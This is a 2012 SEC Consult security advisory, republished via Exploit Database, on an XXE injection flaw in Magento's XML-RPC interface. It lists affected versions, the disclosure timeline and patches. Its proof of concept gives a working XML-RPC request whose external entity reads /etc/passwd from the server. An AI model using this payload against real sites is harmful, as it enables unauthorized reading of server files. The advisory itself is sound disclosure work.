Magento eCommerce – Local File Disclosure

• Exploit Database
• 44 阅读

• 作者： SEC Consult
  日期： 2012-07-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19793/

• SEC Consult Vulnerability Lab Security Advisory < 20120712-0 >
  =======================================================================
  title: Local file disclosure via XXE injection
  product: Magento eCommerce Platform
   Enterprise & Community Edition
   vulnerable version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.1
   Magento eCommerce Platform Community Edition <= v1.7.0.1
  
  fixed version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.2
   Magento eCommerce Platform Community Edition <= v1.7.0.2
   impact: Critical
   homepage: http://www.magentocommerce.com/
  found: 2012-06-18
   by: K. Gudinavicius
   SEC Consult Vulnerability Lab
   https://www.sec-consult.com
  =======================================================================
  
  Vendor description:
  -------------------
  "Magento eCommerce Platforms provide the scalability, flexibility and features
  for business growth. Magento provides feature-rich eCommerce platforms that
  offer merchants complete flexibility and control over the presentation,
  content, and functionality of their online channel."
  
  Source: http://www.magentocommerce.com/product/features
  
  
  
  Vulnerability overview/description:
  -----------------------------------
  Magento eCommerce platform uses a vulnerable version of Zend framework which
  is prone to XML eXternal Entity Injection attacks. The SimpleXMLElement class
  of Zend framework (SimpleXML PHP extension) is used in an insecure way to
  parse XML data.External entities can be specified by adding a specific
  DOCTYPE element to XML-RPC requests. By exploiting this vulnerability an
  application may be coerced to open arbitrary files and/or TCP connections.
  
  
  
  Proof of concept:
  -----------------
  Magento uses a vulnerable Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php)
  to handle XML-RPC requests. Hence it is possible to disclose arbitrary local
  files from the remote system. The following HTTP POST request to the
  vulnerable XmlRpc server application illustrates the exploitation of this
  vulnerability:
  
  POST /index.php/api/xmlrpc HTTP/1.1
  Host: $host
  
  <?xml version="1.0"?>
   <!DOCTYPE foo [
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
  <methodCall>
  <methodName>&xxe;</methodName>
  </methodCall>
  
  
  
  Vulnerable / tested versions:
  -----------------------------
  Magento eCommerce Platform Enterprise Edition v1.10.1.1
  Magento eCommerce Platform Community Edition v1.7.0.0 & v1.7.0.1
  
  Earlier versions are probably affected too!
  
  
  Vendor contact timeline:
  ------------------------
  2012-06-18: Contacting vendor through the contact form on the webpage as no email
  addresses or security contacts are to be found
  http://www.magentocommerce.com/company/contact-us
  2012-06-20: No reply so far, hence trying again by choosing a different contact
  reason.
  2012-06-21: Creating a bug tracking entry, asking for security contact
  http://www.magentocommerce.com/bug-tracking.
  2012-06-21: Vendor reply: security@magento.com should be used.
  2012-06-22: Sending advisory draft.
  2012-06-22: Vendor reply: Testing workaround for customers to disable XMLRPC
  functionality, patch in progress; vendor will improve website to
  provide a clearer, more direct method for researchers.
  2012-06-25: Asking for affected versions and release timeline.
  2012-06-26: Informing Magento about Zend framework advisory.
  2012-06-27: Vendor: sending more information to SEC Consult soon.
  2012-07-04: Asking vendor about status.
  2012-07-05: Vendor releases new versions and patches.
  2012-07-12: SEC Consult releases detailed advisory.
  
  
  
  Solution:
  ---------
  Magento Community Edition
  
  * 1.7.0.0+ - Upgrade to the latest version, currently v1.7.0.2:
  http://www.magentocommerce.com/download
  
  * 1.4.0.0 - 1.4.1.1 - Apply the patch
  http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.0.0-1.4.1.1.patch
  
  * 1.4.2.0 - Apply the patch
  http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.2.0.patch
  
  * 1.5.0.0 - 1.7.0.1 - Apply the patch
  http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.5.0.0-1.7.0.1.patch
  
  Magento Enterprise Edition
  
  * 1.12.0.0+ - Upgrade to the latest version, currently v1.12.0.2:
  https://www.magentocommerce.com/products/customer/account/index/
  
  * 1.8.0.0 – 1.11.X.X - Apply the Zend Security Upgrades patch
  https://www.magentocommerce.com/products/customer/account/index/
  
  Magento Professional Edition
  
  * All versions - Apply the Zend Security Upgrades patch
  https://www.magentocommerce.com/products/customer/account/index/
  
  More information can be found at:
  http://www.magentocommerce.com/blog/comments/update-zend-framework-vulnerability-security-update/
  
  
  
  Workaround:
  -----------
  Detailed steps can be found at:
  http://www.magentocommerce.com/blog/comments/update-zend-framework-vulnerability-security-update/
  
  
  
  Advisory URL:
  -------------
  https://www.sec-consult.com/en/advisories.html
  
  
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  SEC Consult Unternehmensberatung GmbH
  
  Office Vienna
  Mooslackengasse 17
  A-1190 Vienna
  Austria
  
  Tel.: +43 / 1 / 890 30 43 - 0
  Fax.: +43 / 1 / 890 30 43 - 25
  Mail: research at sec-consult dot com
  https://www.sec-consult.com
  
  EOF K. Gudinavicius, J. Greil / @2012